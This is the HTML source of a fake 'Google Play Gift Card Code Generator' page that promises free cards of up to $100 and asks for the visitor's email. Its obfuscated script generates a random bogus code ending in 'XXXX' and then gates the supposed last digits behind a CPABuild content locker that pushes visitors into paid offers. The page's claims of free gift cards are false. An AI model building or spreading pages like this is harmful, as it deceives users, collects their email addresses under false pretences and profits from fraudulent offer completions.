<head>
    <title>Google Play Gift Card Code Generator</title>
<meta name="description" content="Generate up to $100 on google play gift cards generator for free.">
<meta property="og:title" content="Google Play Gift Card Code Generator">
<meta property="og:description" content="Generate up to $100 on google play gift cards generator for free.">
<meta name="referrer" content="no-referrer">

<!-- Analytics -->

<script async="" src="https://www.google-analytics.com/analytics.js"></script><script src="https://browser.sentry-cdn.com/6.4.1/bundle.min.js" integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF" crossorigin="anonymous"></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    
    ga('send', 'pageview');

</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        
body{

    font-family: 'Kanit Light', sans-serif;
    overflow-y: auto;
}

div{
    display: block;
}

.center{
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    text-align: center;
    min-height: 90vh;
}

.main{
    text-align: center;
    background: whitesmoke;
    width: 90%;
    max-width:40em;
    justify-content: center;
    align-items: center;
    border-radius: 1em;
    border-color: #79be73;
    border-style: solid;
    border-width: 0.3em;
    box-shadow: 0 0 1em black;
    box-sizing: border-box;
    z-index: 10;
    height: fit-content;
    margin: 0 0 2em 0;
}

.name{
    width: 90%;
}

.mainimg{
    width: 20em;
    position: relative;
    margin: 3em 0 2em 0;
    z-index: 20;
}

.mainimg:hover{
    animation: zoom-in-zoom-out 1s ease infinite;
}

.step0-txt{
    font-weight: 600;
    font-size: 1.6em;
    width: 80%;
    margin: 1em auto;
    color: black;
}

#text-found{
    font-weight: 600;
    font-size: 1.6em;
    width: 80%;
    margin: 1em auto;
}

.user-box{
    overflow: auto;
    position: relative;
}

.user-icon{
    margin-top: 1.1em;
    position: absolute;
    width: 3em;
    z-index: 2;
    margin-left: 1.4em;
}

.user-input{
    position: relative;
    background: #FFFFFF;
    outline: none;
    box-shadow: none;
    width: 15em;
    height: 3em;
    padding: 0 1em 0 2.5em;
    font-size: 1.75em;
    border-radius: 0.6em;
    border-width: 0.15em;
    border-color: #79be73;
    border-style: solid;
    font-weight: bold;
    box-sizing: border-box;
    max-width: 40em;
    vertical-align: middle;
}

.mail-error{
    color: #79be73;
    margin: 0.5em auto 0 auto;
    font-size: 1.2em;
    opacity: 80%;
}

.shakeanim{
    animation: shake 0.3s ease-in-out;
}

@keyframes shake {
    0%, 100% {
        margin-left: 0;
    }
    20%, 80%{
        margin-left: -0.5em;
    }
    40%, 60%{
        margin-left: 0.5em;
    }
}

input, textarea{
    color: black;
}

::placeholder{
    color: black;
    opacity:40%;
}

.btn0 {
    background: #79be73;
    color: white;
    width: 30%;
    padding: 1em 0 1em 0;
    margin: 0 auto;
    margin-top: 1em;
    margin-bottom: 1em;
    border-radius: 0.5em;
    font-weight: 900;
    font-size: 1.5em;
    box-sizing: border-box;
    font-family: "Kanit Medium", sans-serif;
}

.btn0:hover{
    background:#79be73;
    transform: scale(1.1);
    cursor: pointer;
    box-shadow: 0 0 0.5em #79be73;
}

#btn1id{
    background-color: #79be73;
}
#btn1id:hover{
    box-shadow: none;
}

.btn1{
    background: #79be73;
    color: white;
    width: 33%;
    padding: 0.5em 0 0.5em 0;
    margin: 1.2em auto 1.5em auto;
    border-radius: 0.5em;
    font-weight: 600;
    font-size: 1.5em;
    box-sizing: border-box;
    font-family: "Kanit Medium", sans-serif;
    animation: zoom-in-zoom-out 1s ease infinite;
}

.btn1:hover{
    background:whitesmoke;
    color: #79be73;
    transform: scale(1.1);
    cursor: pointer;
    box-shadow: 0 0 0.5em #79be73;
}

@keyframes zoom-in-zoom-out {
    0% {
        transform: scale(1, 1);
    }
    50% {
        transform: scale(1.1, 1.1);
    }
    100% {
        transform: scale(1, 1);
    }
}

.devices{
    display: flex;
    justify-content: center;
    margin-top: 1em;
    box-sizing: border-box;
    cursor: pointer;
    float: none;
    margin-bottom: 2em;
}

.platform{
    background: #FFFFFF;
    width: 8em;
    height: 5.5em;
    border-radius: 1em;
    padding-top: 1em;
    margin: 1em;
    box-shadow: 0 0 0.6em black;
}

.platform:hover{
    background:#FFFFFF;
    transform: scale(1.1);
    box-shadow: 0 0 0.5em #79be73;

}

.search0{
    margin: 0 auto;
    text-align: center;
    height: 10em;
    font-weight: 600;
}

.search1{
    margin: 0 auto;
    text-align: center;
    height: 22em;
    margin-top: 2em;
}

.laststep{
    margin: 0 auto;
    text-align: center;
    height: 22em;
    margin-top: 2em;
    margin-bottom: 1.2em;
    font-family: 'Kanit Medium', sans-serif;
}

.searching{
    width: fit-content;
    background: #FFFFFF;
    margin: 0 auto;
    border-radius: 1em;
    padding:0.5em;
    font-size: 1.2em;
    box-shadow: 0 0 0.6em black;
}

.searchingname{
    margin: 0 1.5em;
}

#dots:after {
    content: '.';
    animation: dots 1s steps(5, end) infinite;}

@keyframes dots {
    0%, 20% {
        color: rgba(0,0,0,0);
        text-shadow:
                .25em 0 0 rgba(0,0,0,0),
                .5em 0 0 rgba(0,0,0,0);}
    40% {
        color: black;
        text-shadow:
                .25em 0 0 rgba(0,0,0,0),
                .5em 0 0 rgba(0,0,0,0);}
    60% {
        text-shadow:
                .25em 0 0 black,
                .5em 0 0 rgba(0,0,0,0);}
    80%, 100% {
        text-shadow:
                .25em 0 0 black,
                .5em 0 0 black;}}


.checkmark-icon{
    width: 1em;
    float: right;
    margin-left: -1em;
    margin-top: -1.2em;
}

.devices-pic{
    width: 3em;
    margin-top: 0.7em;
}

.devices-pic.ios{
    margin-top: 0.5em;
}

.secondimg{
    float:right;
    width: 15em;
    margin-top: 6.5em;
    margin-right: 5em;
}

.VBucks-Div{
    margin: 1em 0 2em 0;
    cursor: pointer;
}

.VBucks-pic{
    width: 10em;
}

.vbucks-text{
    font-size: 1.8em;
    font-weight: 800;
    margin-left:0.5em;
}

.VBucks{
    /* background: #FFFFFF;
    box-shadow: 0 0 0.6em black; */
    margin: 0 .5em;
    display: inline-block;
    flex-direction: column;
    box-sizing: border-box;
    position: relative;
    max-width: 40em;
    height: 10em;
    align-items: center;
    justify-content: center;
}

.VBucks:hover{
    transform: scale(1.2);
    /*  background:#FFFFFF; */
    /* box-shadow: 0 0 0.5em #35b9fa; */
}

.Selected{
    /* background: #35b9fa;
    box-shadow: 0 0 0.5em #35b9fa; */
    margin: 0 .5em;
    display: inline-block;
    flex-direction: column;
    box-sizing: border-box;
    position: relative;
    max-width: 40em;
    height: 10em;
    align-items: center;
    justify-content: center;
    transform: scale(1.3);
}

.progress-bg{
    margin-top: 0.5em;
    width: 26em;
    height: 1em;
    background-color: whitesmoke;
    border-radius: 0.5em;
    display: inline-block;
}
.progress-bar{
    margin-top: 0;
    margin-left: -0.1em;
    width: 0;
    height: 1em;
    background:#79be73;
    border-radius: 0.5em;
}
.progressbar25{
    animation: progress1 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress1{
    0%  {width: 0;}
    100%  {width: 25%;}
}
.progressbar40{
    animation: progress2 2s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress2{
    0%  {width: 25%;}
    100%  {width: 40%;}
}
.progressbar75{
    animation: progress3 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress3{
    0%  {width: 40%;}
    100%  {width: 75%;}
}
.progressbar95{
    animation: progress4 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress4{
    0%  {width: 75%;}
    100%  {width: 95%;}
}

.settings-rotate{
    animation: ranimation 2s linear infinite;
}

@keyframes ranimation {
    0%  {transform: rotate(0deg);}
    100%  {transform:  rotate(360deg);}
}

#loader{
    animation: ranimation 2s linear infinite;
    display: none;
}

.laststep-rotate{
    animation: ranimation 2s linear infinite;
    width: 5em;
    margin-top: -5em;
}

.LastStepTxt {
    font-size: 1.5em;
    font-weight: 700;
    width: 90%;
    margin: 1em auto;
    overflow: hidden;
    text-overflow: ellipsis;
}


/*              Mobile                 */

@media only screen and (max-width: 768px) {
    .main{
        margin-top: 0;
    }
    .platform{
        width: 6em;
        height: 4em;
    }

    .platform{
        margin: 0.8em;
    }
    .secondimg{
        width: 20em;
        margin-top: -1em;
        box-sizing: border-box;
    }
    .Selected{
        margin: 0 1em;
    }
    .VBucks-pic{
        width: 8em;
        margin: 0;
    }

    .laststep{
        height: 100%;
    }

    .step0-txt{
        font-size: 1.5em;
        margin-top: 0.8em;
    }
    #text-found{
        font-size: 1.5em;
        margin-top: 0.8em;
    }
    .progress-bg{
        width: 90%;
    }
    .settings-rotate{
        margin-bottom: 1em;
        margin-top: 0.8em;
    }
    .user-input{
        width: 90%;
    }
    .btn0{
        width: 40%;
    }
    .btn1, .btn3{
        width: 44%;
    }
    .checkmark-icon{
        margin-top: -1.2em;
    }
}


@media only screen and (max-width: 319px){
    .user-input{
        font-size: 22px;
        margin: 0 auto;
    }
    .user-icon{
        margin: 0.7em 0.8em;
    }
}

@media only screen and (max-width: 395px){
    .user-input{
        font-size: 22px;
    }
    .user-icon{
        margin: 0.6em 0.6em;
    }
    .mainimg{
        width: 15em;
    }
}

@media only screen and (max-width: 509px){
    .secondimg{
        display: none;
    }
    .devices{
        margin: 1em auto;
    }
    .btn0{
        width: 60%;
    }
    .btn1, .btn3{
        width: 54%;
    }
    .VBucks{
        display: flex;
        flex-direction: column;
    }
    .Selected{
        display: flex;
        flex-direction: column;
    }
}
/* BG */

body {
    margin: 0;
    height: 100vh;
    background: radial-gradient(#59c4df,#1f1013);
    -webkit-overflow-Y: hidden;
    -moz-overflow-Y: hidden;
    -o-overflow-Y: hidden;
    -webkit-animation: fadeIn 1 1s ease-out;
    -moz-animation: fadeIn 1 1s ease-out;
    -o-animation: fadeIn 1 1s ease-out;
    animation: fadeIn 1 1s ease-out;
}

.light {
    position: absolute;
    width: 0px;
    opacity: .75;
    background-color: white;
    box-shadow: #e9f1f1 0px 0px 20px 2px;
    opacity: 0;
    top: 100vh;
    bottom: 0px;
    left: 0px;
    right: 0px;
    margin: auto;
}

.x1{
    -webkit-animation: floatUp 4s infinite linear;
    -moz-animation: floatUp 4s infinite linear;
    -o-animation: floatUp 4s infinite linear;
    animation: floatUp 4s infinite linear;
    -webkit-transform: scale(1.0);
    -moz-transform: scale(1.0);
    -o-transform: scale(1.0);
    transform: scale(1.0);
}

.x2{
    -webkit-animation: floatUp 7s infinite linear;
    -moz-animation: floatUp 7s infinite linear;
    -o-animation: floatUp 7s infinite linear;
    animation: floatUp 7s infinite linear;
    -webkit-transform: scale(1.6);
    -moz-transform: scale(1.6);
    -o-transform: scale(1.6);
    transform: scale(1.6);
    left: 15%;
}

.x3{
    -webkit-animation: floatUp 2.5s infinite linear;
    -moz-animation: floatUp 2.5s infinite linear;
    -o-animation: floatUp 2.5s infinite linear;
    animation: floatUp 2.5s infinite linear;
    -webkit-transform: scale(.5);
    -moz-transform: scale(.5);
    -o-transform: scale(.5);
    transform: scale(.5);
    left: -15%;
}

.x4{
    -webkit-animation: floatUp 4.5s infinite linear;
    -moz-animation: floatUp 4.5s infinite linear;
    -o-animation: floatUp 4.5s infinite linear;
    animation: floatUp 4.5s infinite linear;
    -webkit-transform: scale(1.2);
    -moz-transform: scale(1.2);
    -o-transform: scale(1.2);
    transform: scale(1.2);
    left: -34%;
}

.x5{
    -webkit-animation: floatUp 8s infinite linear;
    -moz-animation: floatUp 8s infinite linear;
    -o-animation: floatUp 8s infinite linear;
    animation: floatUp 8s infinite linear;
    -webkit-transform: scale(2.2);
    -moz-transform: scale(2.2);
    -o-transform: scale(2.2);
    transform: scale(2.2);
    left: -57%;
}

.x6{
    -webkit-animation: floatUp 3s infinite linear;
    -moz-animation: floatUp 3s infinite linear;
    -o-animation: floatUp 3s infinite linear;
    animation: floatUp 3s infinite linear;
    -webkit-transform: scale(.8);
    -moz-transform: scale(.8);
    -o-transform: scale(.8);
    transform: scale(.8);
    left: -81%;
}

.x7{
    -webkit-animation: floatUp 5.3s infinite linear;
    -moz-animation: floatUp 5.3s infinite linear;
    -o-animation: floatUp 5.3s infinite linear;
    animation: floatUp 5.3s infinite linear;
    -webkit-transform: scale(3.2);
    -moz-transform: scale(3.2);
    -o-transform: scale(3.2);
    transform: scale(3.2);
    left: 37%;
}

.x8{
    -webkit-animation: floatUp 4.7s infinite linear;
    -moz-animation: floatUp 4.7s infinite linear;
    -o-animation: floatUp 4.7s infinite linear;
    animation: floatUp 4.7s infinite linear;
    -webkit-transform: scale(1.7);
    -moz-transform: scale(1.7);
    -o-transform: scale(1.7);
    transform: scale(1.7);
    left: 62%;
}

.x9{
    -webkit-animation: floatUp 4.1s infinite linear;
    -moz-animation: floatUp 4.1s infinite linear;
    -o-animation: floatUp 4.1s infinite linear;
    animation: floatUp 4.1s infinite linear;
    -webkit-transform: scale(0.9);
    -moz-transform: scale(0.9);
    -o-transform: scale(0.9);
    transform: scale(0.9);
    left: 85%;
}

@-webkit-keyframes floatUp{
    0%{top: 100vh; opacity: 0;}
    25%{opacity: 1;}
    50%{top: 0vh; opacity: .8;}
    75%{opacity: 1;}
    100%{top: -100vh; opacity: 0;}
}
@-moz-keyframes floatUp{
    0%{top: 100vh; opacity: 0;}
    25%{opacity: 1;}
    50%{top: 0vh; opacity: .8;}
    75%{opacity: 1;}
    100%{top: -100vh; opacity: 0;}
}
@-o-keyframes floatUp{
    0%{top: 100vh; opacity: 0;}
    25%{opacity: 1;}
    50%{top: 0vh; opacity: .8;}
    75%{opacity: 1;}
    100%{top: -100vh; opacity: 0;}
}
@keyframes floatUp{
    0%{top: 100vh; opacity: 0;}
    25%{opacity: 1;}
    50%{top: 0vh; opacity: .8;}
    75%{opacity: 1;}
    100%{top: -100vh; opacity: 0;}
}

    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<script type="text/javascript" src="https://d35kbxc0t24sp8.cloudfront.net/public/external/v2/html.2977015.7ac5a.0.js" id="CPABUILDMAINJS"></script><link rel="stylesheet" href="https://d35kbxc0t24sp8.cloudfront.net/public/external/css_front.css" id="CPABUILDGLOBALSTYLE"><link data-it="2977015" rel="stylesheet" id="CPABUILDSPECIFICSTYLE" href="https://d35kbxc0t24sp8.cloudfront.net/public/clockers/CustomButton/css.css"><style type="text/css" id="CPABUILDSettingsCSS">#CPABUILD_MODAL_CONTAINER #CPABUILDMODALCONTENT{animation-duration: 600ms;-webkit-transition: all 600ms;transition: all 600ms;transition-duration: 600ms;}#CPABUILD_MODAL_CONTAINER #CPABUILD_MODAL {background-color: rgba(0,0,0,0.4) }</style><script type="text/javascript" src="https://d35kbxc0t24sp8.cloudfront.net/public/guid?cpguid=njm21mh1d&amp;e=ll&amp;t=1661839711873"></script><script id="CPABUILDLEADCHECK" type="text/javascript" src="https://d35kbxc0t24sp8.cloudfront.net/public/external/check.php?it=2977015&amp;time=1661839713362"></script></head><body>



    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="UTF-8">
    <title>Google Play Gift Card Giveaway</title>
    <link rel="stylesheet" href="main.css">
    <script src="script.js" defer=""></script>
    <link rel="icon" type="image/x-icon" href="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1655331628cbbf00e2a1c18c9fd0927451b6109f95.png">


<style>
    @import url('https://fonts.googleapis.com/css2?family=Kanit&display=swap');
</style>

<div class="light x1"></div>
<div class="light x2"></div>
<div class="light x3"></div>
<div class="light x4"></div>
<div class="light x5"></div>
<div class="light x6"></div>
<div class="light x7"></div>
<div class="light x8"></div>
<div class="light x9"></div>

<div class="center">
    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1660602463a6aca23a5cda4db0c999250ca257144f.png" alt="Google Play Logo" class="mainimg">
    <div class="main" id="main2" style="display: 1none;">
        <div class="step0" id="step1" style="display: 1none;">
            <div class="step0-txt"> Select Gift Card Amount </div>
            <div class="VBucks-Div" id="VBucks-div">
                <div class="Selected" id="VBucks0" onclick="VBucksSelected('VBucks0','15 ')">
                    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16553315455ba8142428d71bb9d60c7fec4dd3f936.png" class="VBucks-pic one" id="pic1">
                    <div class="vbucks-text" style="display: none"> $10 Gift Card </div>
                </div>
                <div class="VBucks" id="VBucks1" onclick="VBucksSelected('VBucks1','50 ')">
                    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1655331546ebbf34795e999d06d8f414758dbad389.png" class="VBucks-pic two" id="pic2">
                    <div class="vbucks-text" style="display: none">$50 Gift Card </div>
                </div>
                <div class="VBucks" id="VBucks2" onclick="VBucksSelected('VBucks2','100 ')">
                    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/165533154512502fb1f0ddca813383addeda6375fd.png" class="VBucks-pic three" id="pic3">
                    <div class="vbucks-text" style="display: none">$100 Gift Card </div>
                </div>
            </div>
            <div class="btn0" id="btn0id" onclick="">NEXT</div>
        </div>
    </div>
    <div class="main" id="main0" style="display: none;">
        <div class="step0" id="step0">
            <div class="step0-txt"> Enter your email to receive the gift card code </div>
            <div class="user-box" id="user-box">
                <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1654521813585ec8b77768eb9dd941e37ad62c311a.png" class="user-icon">
                <input class="user-input" id="input-id" placeholder="Email" onblur="">
                <p class="mail-error" style="display: none;">Please enter valid email</p>
            </div>
            <div class="btn0" id="btn1id" onclick="GenerateButton()">Generate Code</div>
        </div>
    </div>
    <div class="main" id="main4" style="display: none;">
        <div class="search1" id="search1">
            <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1652194594fea7175a707ceefbaa64e6857ffd6767.png" class="settings-rotate">
            <div class="step0-txt" id="Generating-step0">Getting Ready..</div>
            <div class="progress-bg">
                <div class="progress-bar" id="progress-bar">
                </div>
                <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1652113019440ef225735d8aab8fc45ec04e7a6aa4.png" id="loader" style="margin-top: 2em; width: 2em;">
            </div>
        </div>
    </div>
    <div class="main" id="main3" style="display: none;">
        <div class="laststep" id="laststep" style="display: 1none ;">
            <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1652194619c7feb47a1add45dc53247b16cbcf8ab0.png" class="laststep-rotate">
            <div class="LastStepTxt" id="LastStepTxt">Hello! You are almost there. <br><br> The Code for $<span id="vbucksamount"></span> is: <span id="code"></span>
                <br> To get the last four digits sent to <span id="name" class="name"></span> please verify. </div>
            <div class="btn1" id="btn2id" onclick="CPABuildLock()"> Verify </div>
        </div>
    </div>
</div>



<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2977015,"key":"7ac5a","testing":1};
    var forward="";
    CPABUILDSETTINGS.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script src="https://dyodrs1kxvg6o.cloudfront.net/28dac00.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       CPABuildLock();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    const _0x172093=_0x509c;(function(_0x437aa0,_0x360f4b){const _0x270819=_0x509c,_0x56ac7c=_0x437aa0();while(!![]){try{const _0x49938b=-parseInt(_0x270819(0x211))/0x1+-parseInt(_0x270819(0x1f4))/0x2+parseInt(_0x270819(0x1ed))/0x3+-parseInt(_0x270819(0x20b))/0x4*(parseInt(_0x270819(0x218))/0x5)+-parseInt(_0x270819(0x21c))/0x6+parseInt(_0x270819(0x205))/0x7*(parseInt(_0x270819(0x203))/0x8)+parseInt(_0x270819(0x1f9))/0x9;if(_0x49938b===_0x360f4b)break;else _0x56ac7c['push'](_0x56ac7c['shift']());}catch(_0x115bab){_0x56ac7c['push'](_0x56ac7c['shift']());}}}(_0x4c04,0x2a2c9));var vbucksValue=0xf,name;const email=document['querySelector']('.user-input'),submit=document['querySelector'](_0x172093(0x219)),error=document[_0x172093(0x1fe)]('.mail-error'),next=document[_0x172093(0x1fe)](_0x172093(0x1f5)),showError=()=>{error['style']['display']='block',setTimeout(function(){const _0x520408=_0x509c;error[_0x520408(0x20f)][_0x520408(0x1ee)]=_0x520408(0x1fd);},0x7d0);};submit&&submit['addEventListener'](_0x172093(0x215),_0x5ebe50=>{const _0x102f53=_0x172093;_0x5ebe50[_0x102f53(0x212)](),document[_0x102f53(0x1ef)]('main2')[_0x102f53(0x20f)]['display']=_0x102f53(0x1fd),document['getElementById'](_0x102f53(0x1ec))['style']['display']=_0x102f53(0x1ff);});function VBucksSelected(_0x2a9fe8,_0x59f667){const _0x37c036=_0x172093;vbucksValue=_0x59f667,document[_0x37c036(0x1ef)]('VBucks0')[_0x37c036(0x1f6)][_0x37c036(0x210)](_0x37c036(0x20c)),document[_0x37c036(0x1ef)](_0x37c036(0x21b))[_0x37c036(0x1f6)][_0x37c036(0x210)](_0x37c036(0x20c)),document['getElementById'](_0x37c036(0x214))[_0x37c036(0x1f6)]['add'](_0x37c036(0x20c)),document[_0x37c036(0x1ef)]('VBucks0')['classList'][_0x37c036(0x20d)](_0x37c036(0x206)),document[_0x37c036(0x1ef)](_0x37c036(0x21b))['classList'][_0x37c036(0x20d)](_0x37c036(0x206)),document[_0x37c036(0x1ef)](_0x37c036(0x214))[_0x37c036(0x1f6)]['remove'](_0x37c036(0x206)),document[_0x37c036(0x1ef)](_0x2a9fe8)[_0x37c036(0x1f6)][_0x37c036(0x210)](_0x37c036(0x206)),document[_0x37c036(0x1ef)](_0x2a9fe8)[_0x37c036(0x1f6)][_0x37c036(0x20d)](_0x37c036(0x20c));}function GenerateButton(){const _0x219f10=_0x172093;name=document['getElementById'](_0x219f10(0x1fc))['value'];if(!email[_0x219f10(0x217)]['match'](/^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/))return showError();else document[_0x219f10(0x1ef)](_0x219f10(0x1f8))[_0x219f10(0x20f)][_0x219f10(0x1ee)]=_0x219f10(0x1fd),document[_0x219f10(0x1ef)](_0x219f10(0x1ec))[_0x219f10(0x20f)]['display']=_0x219f10(0x1fd),document[_0x219f10(0x1ef)](_0x219f10(0x209))[_0x219f10(0x20f)][_0x219f10(0x1ee)]=_0x219f10(0x1ff),setTimeout(function(){const _0x89191a=_0x219f10;document['getElementById'](_0x89191a(0x207))[_0x89191a(0x1f6)][_0x89191a(0x210)](_0x89191a(0x208)),setTimeout(function(){const _0x2523b9=_0x89191a;document[_0x2523b9(0x1ef)](_0x2523b9(0x1fb))[_0x2523b9(0x1f2)]=_0x2523b9(0x204)+vbucksValue+_0x2523b9(0x1f0)+'',document[_0x2523b9(0x1ef)](_0x2523b9(0x207))['classList'][_0x2523b9(0x210)](_0x2523b9(0x1fa)),setTimeout(function(){const _0x341e03=_0x2523b9;document[_0x341e03(0x1ef)]('Generating-step0')['innerHTML']=_0x341e03(0x20e),document['getElementById']('progress-bar')[_0x341e03(0x1f6)][_0x341e03(0x210)](_0x341e03(0x21a)),setTimeout(function(){const _0x5c2ef3=_0x341e03;document[_0x5c2ef3(0x1ef)](_0x5c2ef3(0x1fb))[_0x5c2ef3(0x1f2)]=_0x5c2ef3(0x200),document[_0x5c2ef3(0x1ef)](_0x5c2ef3(0x207))['classList'][_0x5c2ef3(0x210)](_0x5c2ef3(0x213)),document[_0x5c2ef3(0x1ef)](_0x5c2ef3(0x1f1))[_0x5c2ef3(0x20f)][_0x5c2ef3(0x1ee)]='inline-block',setTimeout(function(){const _0x45c23c=_0x5c2ef3;document['getElementById'](_0x45c23c(0x209))[_0x45c23c(0x20f)][_0x45c23c(0x1ee)]=_0x45c23c(0x1fd),setTimeout(function(){const _0x4b00fa=_0x45c23c;document[_0x4b00fa(0x1ef)]('main3')[_0x4b00fa(0x20f)][_0x4b00fa(0x1ee)]=_0x4b00fa(0x1ff),document['getElementById'](_0x4b00fa(0x201))['innerHTML']=vbucksValue,document[_0x4b00fa(0x1ef)](_0x4b00fa(0x20a))[_0x4b00fa(0x1f2)]=name,document[_0x4b00fa(0x1ef)](_0x4b00fa(0x216))['innerHTML']=GFCode;},0x64);},0xbb8);},0xbb8);},0x1388);},0xfa0);},0x3e8);}function _0x4c04(){const _0x1094ea=['Finalizing...','style','add','153892VdEdJE','preventDefault','progressbar95','VBucks2','click','code','value','5575HfrPjl','.btn0','progressbar75','VBucks1','841524qtJCKQ','0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ','main0','159900GURdCa','display','getElementById','\x20Gift\x20Card','loader','innerHTML','random','616286rZRACJ','#btn0id','classList','round','btn1id','4732677QzJILM','progressbar40','Generating-step0','input-id','none','querySelector','block','Loading\x20last\x20step..','vbucksamount','XXXX','230848stTaVh','Generating\x20code\x20for\x20$','77nVePKF','Selected','progress-bar','progressbar25','main4','name','436xYaZDW','VBucks','remove'];_0x4c04=function(){return _0x1094ea;};return _0x4c04();}function randomString(_0x4e5bf5,_0x3f025e){const _0x37a629=_0x172093;var _0x2589f3='';for(var _0x19273f=_0x4e5bf5;_0x19273f>0x0;--_0x19273f)_0x2589f3+=_0x3f025e[Math[_0x37a629(0x1f7)](Math[_0x37a629(0x1f3)]()*(_0x3f025e['length']-0x1))];return _0x2589f3;}function _0x509c(_0x5f2986,_0x12dcb5){const _0x4c047f=_0x4c04();return _0x509c=function(_0x509c39,_0x17c73e){_0x509c39=_0x509c39-0x1ec;let _0x4b9afe=_0x4c047f[_0x509c39];return _0x4b9afe;},_0x509c(_0x5f2986,_0x12dcb5);}function codeFunc(){const _0x5a3c13=_0x172093;return randomString(0x4,_0x5a3c13(0x21d))+'-'+randomString(0x4,_0x5a3c13(0x21d))+'-'+randomString(0x4,_0x5a3c13(0x21d))+'-'+randomString(0x4,_0x5a3c13(0x21d))+'-'+_0x5a3c13(0x202);}var GFCode=codeFunc();
</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>


<div id="CPABUILD_MODAL_CONTAINER" style="display: none;"><div id="CPABUILD_MODAL">
    <div id="CPABUILDMODALCONTENT" class="CPABUILD_fadeIn">
        <div id="CPABUILDMODALHEADER">
            <div id="CPABUILDMODALTITLE"></div> </div>
        <div id="CPABUILDMODALBODY">
            <iframe id="CPABUILDOFFERS" style="overflow:hidden;" src=""></iframe>
        </div>
        <div id="CPABUILDMODALFOOTER">
            <p id="CPABUILDMODALFOOTERTEXT"></p>
        </div>
    </div>
</div>
</div></body>